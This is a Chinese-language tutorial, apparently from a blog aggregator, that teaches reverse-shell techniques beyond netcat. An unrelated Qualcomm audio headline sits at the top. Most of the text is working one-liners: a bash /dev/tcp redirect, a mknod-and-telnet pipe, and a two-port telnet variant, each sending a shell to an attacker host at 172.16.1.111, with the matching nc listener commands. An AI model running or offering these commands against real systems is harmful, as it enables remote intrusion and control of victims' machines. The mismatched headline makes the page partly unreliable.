高通釋出兩款全新音訊平臺,支援驍龍暢聽技術
阿新 • • 發佈:2022-03-01
在Netcat的學習中我們學習瞭如何使用nc -e /bin/bash
反彈shell
這裡分享一些除了nc以外其他的反彈方式
Bash反彈shell
bash -i >& /dev/tcp/IP地址/埠 0>&1
/dev/tcp,udp,host,port等是一些特殊的裝置,可以進行讀取和寫入建立socket連線
0>&1 ,將標準輸入顯示到標準輸出bash -i >& /dev/tcp/IP地址/埠
這一段是將我們 bash 執行的命令輸出到 /dev/tcp/目標地址/目標埠中 ,可以這樣簡單的理解
攻擊機:nc -lvp 866
靶機:bash -i >& /dev/tcp/172.16.1.111/866 0>&1
執行後靶機將會無法執行命令
反彈成功
telnet反彈shell
mknod 裝置名 p && telnet targetIp 8080 0<裝置名 | /bin/bash 1>裝置名
利用telnet建立連線|
交給bash處理執行系統命令,0<裝置名
將我們輸入傳入,1>裝置名
將我們輸入傳輸
攻擊機:nc -lvp 866
靶機:mknod test p && telnet 172.16.1.111 866 0<test | /bin/bash 1>test
執行後回到攻擊機
另一種 telnet 反彈
我們在攻擊機監聽1234埠,靶機執行命令telnet 172.16.1.111 1234| /bin/bash
可以看到,我們好像是共享了bash,攻擊機執行命令試一下
並沒有任何回顯,回到靶機
發現我們執行的命令在靶機中執行了,哈哈哈
猜想,我們再次
| telnet 172.16.1.111 8888
連線攻擊機的另一個埠,交個這個埠處理,會不會就顯示過去了?實驗:攻擊機建立連個命令列,分別監聽1111和2222埠
nc -lvp 1111
和nc -lvp 2222
在靶機執行我們猜想的命令
telnet 172.16.1.111 1111 | /bin/bash | telnet 172.16.1.111 2222
執行成功,回到攻擊機我們在1111埠執行命令,在2222埠檢視結果
成功反彈shell,哈哈哈,還有這種怪異的方法